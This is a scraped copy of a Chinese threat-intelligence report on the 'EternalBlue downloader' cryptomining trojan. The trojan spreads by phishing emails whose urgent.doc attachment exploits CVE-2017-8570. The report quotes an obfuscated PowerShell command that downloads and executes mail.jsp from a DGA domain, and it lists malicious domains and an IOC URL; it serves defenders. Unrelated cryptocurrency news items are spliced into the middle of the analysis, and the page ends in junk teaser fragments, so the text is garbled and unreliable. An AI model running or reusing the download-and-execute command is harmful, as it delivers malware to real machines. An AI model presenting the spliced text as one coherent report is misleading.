來源:騰訊御見威脅情報中心
編者注:原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播,附件含CVE-2017-8570漏洞攻擊代碼》
“永恒之藍”下載器木馬在感染用戶機器上運行后,會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔,該文檔附帶CVE-2017-8570漏洞攻擊代碼。
如果被攻擊用戶收到郵件并不慎打開文檔,就可能觸發漏洞執行Powershell命令下載mail.jsp:
美股三大指數集體高開 蘋果市值突破3萬億美元:金色財經報道,美股三大指數集體高開,道指漲0.50%,納指漲0.95%,標普500指數漲0.70%。蘋果漲逾1%,股價創歷史新高,市值突破3萬億美元。區塊鏈概念股走強,Marathon Digital漲逾4%,Riot Platforms、MicroStrategy漲超3%,嘉楠科技漲超2%。[2023/6/30 22:10:53]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
Kraken:建議客戶考慮使用閃電網絡作為替代方案:金色財經報道,加密交易所Kraken的客戶支持經理在 Reddit 上稱,提高比特幣取款費用以匹配當前鏈上的交易費用,這有助于確保及時在鏈上處理取款,該經理還提到該公司公開的加密貨幣提款費用和最低提款金額清單并建議客戶考慮使用閃電網絡 (LN) 作為替代方案。[2023/5/11 14:57:46]
而下載使用的域名ap35nf7.jp實際上并沒有注冊,但是依然能夠解析到地址:t.awcna.com,是因為被感染機器的本地hosts文件被篡改,使得隨機生成的域名映射到木馬使用的惡意地址,細節請參考御見威脅情報中心此前發布的報告:《“永恒之藍下載器”木馬篡改hosts指向隨機域名,再用多個漏洞攻擊內網挖礦》。
外媒:英國財政大臣建議不要匆忙將加密市場納入監管范圍:5月21日消息,英國財政大臣Rishi Sunak在周五的一次講話中警告稱,在政府計劃將英國打造為加密貨幣中心之際,不要過快地將加密市場納入其機構的管轄范圍。Rishi Sunak今年4月曾透露,計劃監管穩定幣,并發布NFT,作為將英國定位為加密貨幣中心的努力的一部分。
盡管如此,FCA負責人Charles Randell表示,需要現實地對待監管“純粹投機性加密代幣”所需的準備,同時,尋求官方授權的加密公司需要進行必要的改進。
當一些加密行業人士敦促政府向監管機構施壓,要求其更加通融時,Randell繼續強調其機構獨立性的重要性。他還稱,不清楚FCA將為在其職責中增加數字資產付出多少成本。
報道稱,英國政府試圖與瑞士和迪拜等加密中心競爭,遭到加密行業許多人的質疑。(英國《金融時報》)[2022/5/22 3:33:18]
本次攻擊過程中,木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp經過高度混淆,多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行,并使用了新的計劃任務名:
“Bluetea“藍茶。
“永恒之藍”下載器木馬自出現之后從未停止更新,從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺,并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上,最初通過供應鏈攻擊積累一批感染機器后,又不斷利用”永恒之藍”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法進行擴散傳播,近期又增加了DGA域名攻擊和釣魚郵件攻擊,其最終目的只為利用用戶機器挖礦門羅幣獲利。
永恒之藍下載器木馬的歷次版本更新參考下表:
安全建議
1.建議用戶不要輕易打開不明來源的郵件附件,對于郵件附件中的文件要格外謹慎運行,如發現有腳本或其他可執行文件可先使用殺軟件進行掃描;
2.服務器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令,避免遭遇弱密碼爆破攻擊;
3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570,需進行漏洞掃描和修復,或采用WindowsUpdate進行。
IOCs
http//t.awcna.com/mail.jsp
Tags:COMPOWMAIHELMintMe.com CoinWoonkly PowerMAID幣Helicopter Finance
作者|哈希派分析團隊 金色財經合約行情分析 | BTC出現一定幅度的補漲行情:據火幣BTC永續合約行情顯示,截至今日18:00(GMT+8),BTC價格暫報9388美元(+1.16%).
1900/1/1 0:00:00作者:馮澤冰?蘆玥 來源:信息通信技術與政策編者注:原標題為《區塊鏈增強無人機蜂群系統安全性分析》摘要:無人機蜂群作戰在面對高強度對抗、動態性戰場變化時具備規模優勢和成本優勢.
1900/1/1 0:00:00許多人開始意識到DeFi的核心驅動力之一就是流動性。無論是以Kyber或Uniswap等項目的DEX增長,還是Synthetix等項目的激勵的形式,我們已經看到了無數種不同的舉措,這些舉措都是旨.
1900/1/1 0:00:00區塊鏈銀行服務和支付初創公司SilaInc.今天宣布已籌集770萬美元種子輪新資金,將用于引入新的產品功能,使軟件開發人員可以更輕松地訪問全球金融系統.
1900/1/1 0:00:00當人們談起加密行業中的金融服務時,他們總會談到「去中心化」或「中心化」。加密布道者傾向于認為前者的風險更小,因為用戶無需信任交易對手就能托管資產,從而避免了由于以下情況導致資金損失的風險:黑客攻.
1900/1/1 0:00:00“不可篡改”是區塊鏈存證信息的特點之一,但在極端情況下該特性會被顛覆。想象一下,在某個平凡且毫無征兆的一天,世界上各個角落的人們各自按照既定的生活模式行止,突然之間,一股神秘的力量將人類從這刻藍.
1900/1/1 0:00:00